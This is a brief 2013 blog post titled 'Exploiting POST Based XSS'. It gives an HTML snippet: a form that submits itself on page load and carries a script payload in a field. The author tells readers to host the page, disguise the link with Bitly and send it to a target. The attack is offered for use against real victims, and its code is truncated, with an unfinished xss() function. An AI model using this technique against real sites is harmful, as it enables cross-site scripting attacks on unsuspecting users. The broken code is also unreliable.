Monday, February 11, 2013

Exploiting POST Based XSS

Found this on the web somewhere and wanted to post it here to have a place to reference it. place the actual XSS in the "abcd" section and place it on a webserver somwhere. Bitly link the exploit code to your target and have it execute.
<body onload=”xss();”>
<form method=post name=f action=””>
<input name=”abcd” value=”<SCRIPT>alert(’XSS’)</SCRIPT>”>
<input type=”submit” class=”button” name=”s”>
function xss() {;

No comments:

Post a Comment